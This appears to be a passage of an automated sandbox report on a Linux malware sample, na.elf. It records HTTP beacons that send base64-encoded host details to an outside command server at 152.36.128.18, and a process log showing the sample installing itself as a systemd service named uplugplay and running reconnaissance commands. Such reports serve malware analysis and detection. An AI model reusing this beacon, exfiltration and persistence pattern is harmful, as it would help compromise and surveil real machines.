                                      Mar 26, 2025 13:44:24.316142082 CET8058316152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:24.316436052 CET5831680192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:24.318099022 CET8058316152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:24.362279892 CET5831680192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:24.430010080 CET5831680192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:24.568327904 CET8058316152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:28.277645111 CET43928443192.168.2.2391.189.91.42
                                      Mar 26, 2025 13:44:29.559124947 CET39256443192.168.2.2334.249.145.219
                                      Mar 26, 2025 13:44:29.559191942 CET4433925634.249.145.219192.168.2.23
                                      Mar 26, 2025 13:44:29.559264898 CET39256443192.168.2.2334.249.145.219
                                      Mar 26, 2025 13:44:29.559488058 CET39256443192.168.2.2334.249.145.219
                                      Mar 26, 2025 13:44:29.559505939 CET4433925634.249.145.219192.168.2.23
                                      Mar 26, 2025 13:44:34.801239014 CET5832080192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:34.941195011 CET8058320152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:34.941356897 CET5832080192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:34.943826914 CET5832080192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:35.126506090 CET8058320152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:35.168800116 CET8058320152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:35.169035912 CET5832080192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:35.170424938 CET5832080192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:35.171448946 CET8058320152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:35.171495914 CET5832080192.168.2.23152.36.128.18
                                      Mar 26, 2025 13:44:35.308480024 CET8058320152.36.128.18192.168.2.23
                                      Mar 26, 2025 13:44:40.563894987 CET42836443192.168.2.2391.189.91.43
                                      Mar 26, 2025 13:44:44.659575939 CET4251680192.168.2.23109.202.202.202
                                      Mar 26, 2025 13:45:09.232028961 CET43928443192.168.2.2391.189.91.42
                                      Mar 26, 2025 13:45:29.551426888 CET39256443192.168.2.2334.249.145.219
                                      Mar 26, 2025 13:45:29.592279911 CET4433925634.249.145.219192.168.2.23
                                      • 152.36.128.18
                                      Session IDSource IPSource PortDestination IPDestination Port
                                      0192.168.2.2358316152.36.128.1880
                                      TimestampBytes transferredDirectionData
                                      Mar 26, 2025 13:44:24.098093033 CET76OUTGET /cgi-bin/p.cgi?r=21&i=G9IF15IMR51KTWGR HTTP/1.0
                                      Host: 152.36.128.18
                                      Mar 26, 2025 13:44:24.316142082 CET217INHTTP/1.1 200 OK
                                      Date: Wed, 26 Mar 2025 12:44:24 GMT
                                      Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                      Content-Length: 7
                                      Connection: close
                                      Content-Type: text/html; charset=windows-1251
                                      Data Raw: 73 79 73 69 6e 66 6f
                                      Data Ascii: sysinfo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192.168.2.2358320152.36.128.1880
                                      TimestampBytes transferredDirectionData
                                      Mar 26, 2025 13:44:34.943826914 CET743OUTGET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA3OjQ0OjMzIHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjY3LCAxLjIxLCAwLjQ5fDE3NDI5OTMwNzMNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=G9IF15IMR51KTWGR&h=galassia&enckey=pwLFR7mvEs4SdxFgc8SCmiJyf+tHzvw1SRJIyIFluNdteMM16R9ReMywiG7HPh3l4ACL3QWuYNWfE9W80VMTXWYQpFA6Zg+yoARVKjiPAGpz+Mt1Obwt0QrRsbkzG5LkszjBEyQd9+3bw2o7ZVabSkzjFkBf/bHQnpwuBUexuGA= HTTP/1.0
                                      Host: 152.36.128.18
                                      Mar 26, 2025 13:44:35.168800116 CET262INHTTP/1.1 200 OK
                                      Date: Wed, 26 Mar 2025 12:44:35 GMT
                                      Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                      Content-Length: 3
                                      Connection: close
                                      Content-Type: text/html; charset=windows-1251
                                      Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                      Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                      System Behavior

                                      Start time (UTC):12:44:08
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:/tmp/na.elf
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:08
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:08
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "pgrep na.elf"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:08
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:08
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/pgrep
                                      Arguments:pgrep na.elf
                                      File size:30968 bytes
                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                      Start time (UTC):12:44:09
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:09
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "pidof na.elf"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:09
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:09
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/pidof
                                      Arguments:pidof na.elf
                                      File size:27016 bytes
                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                      Start time (UTC):12:44:11
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:11
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "pgrep uplugplay"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:11
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:11
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/pgrep
                                      Arguments:pgrep uplugplay
                                      File size:30968 bytes
                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                      Start time (UTC):12:44:13
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:13
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "pgrep upnpsetup"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:13
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:13
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/pgrep
                                      Arguments:pgrep upnpsetup
                                      File size:30968 bytes
                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                      Start time (UTC):12:44:14
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:15
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "pidof upnpsetup"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:15
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:15
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/pidof
                                      Arguments:pidof upnpsetup
                                      File size:27016 bytes
                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                      Start time (UTC):12:44:18
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:18
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "systemctl daemon-reload"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:18
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:18
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/systemctl
                                      Arguments:systemctl daemon-reload
                                      File size:996584 bytes
                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                      Start time (UTC):12:44:19
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:19
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "systemctl enable uplugplay.service"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:19
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:19
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/systemctl
                                      Arguments:systemctl enable uplugplay.service
                                      File size:996584 bytes
                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                      Start time (UTC):12:44:20
                                      Start date (UTC):26/03/2025
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:20
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "systemctl start uplugplay.service"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:20
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:20
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/systemctl
                                      Arguments:systemctl start uplugplay.service
                                      File size:996584 bytes
                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                      Start time (UTC):12:44:18
                                      Start date (UTC):26/03/2025
                                      Path:/usr/lib/systemd/systemd
                                      Arguments:-
                                      File size:1620224 bytes
                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                      Start time (UTC):12:44:18
                                      Start date (UTC):26/03/2025
                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      File size:22760 bytes
                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                      Start time (UTC):12:44:20
                                      Start date (UTC):26/03/2025
                                      Path:/usr/lib/systemd/systemd
                                      Arguments:-
                                      File size:1620224 bytes
                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                      Start time (UTC):12:44:20
                                      Start date (UTC):26/03/2025
                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      File size:22760 bytes
                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/lib/systemd/systemd
                                      Arguments:-
                                      File size:1620224 bytes
                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:/usr/sbin/uplugplay
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:/usr/sbin/uplugplay -Dcomsvc
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c hostnamectl
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:22
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/hostnamectl
                                      Arguments:hostnamectl
                                      File size:26848 bytes
                                      MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                      Start time (UTC):12:44:24
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:24
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c hostnamectl
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:24
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:24
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/hostnamectl
                                      Arguments:hostnamectl
                                      File size:26848 bytes
                                      MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "dmidecode --type baseboard"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/dmidecode
                                      Arguments:dmidecode --type baseboard
                                      File size:121856 bytes
                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c uptime
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/uptime
                                      Arguments:uptime
                                      File size:14568 bytes
                                      MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "uname -a"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/uname
                                      Arguments:uname -a
                                      File size:39288 bytes
                                      MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c dmidecode
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:26
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/dmidecode
                                      Arguments:dmidecode
                                      File size:121856 bytes
                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c uptime
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/uptime
                                      Arguments:uptime
                                      File size:14568 bytes
                                      MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/usr/sbin/uplugplay
                                      Arguments:-
                                      File size:435932 bytes
                                      MD5 hash:17c890ce6d35f2b8172c163319181902

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:sh -c "uname -a"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:44:33
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/uname
                                      Arguments:uname -a
                                      File size:39288 bytes
                                      MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                      Start time (UTC):12:44:25
                                      Start date (UTC):26/03/2025
                                      Path:/usr/lib/systemd/systemd
                                      Arguments:-
                                      File size:1620224 bytes
                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                      Start time (UTC):12:44:25
                                      Start date (UTC):26/03/2025
                                      Path:/lib/systemd/systemd-hostnamed
                                      Arguments:/lib/systemd/systemd-hostnamed
                                      File size:35040 bytes
                                      MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                      Start time (UTC):12:45:28
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/dash
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:45:28
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/rm
                                      Arguments:rm -f /tmp/tmp.ajzlkUCIfc /tmp/tmp.ZSyPQjSoeH /tmp/tmp.jOXLM2DV0E
                                      File size:72056 bytes
                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                      Start time (UTC):12:45:28
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/dash
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):12:45:28
                                      Start date (UTC):26/03/2025
                                      Path:/usr/bin/rm
                                      Arguments:rm -f /tmp/tmp.ajzlkUCIfc /tmp/tmp.ZSyPQjSoeH /tmp/tmp.jOXLM2DV0E
                                      File size:72056 bytes
                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b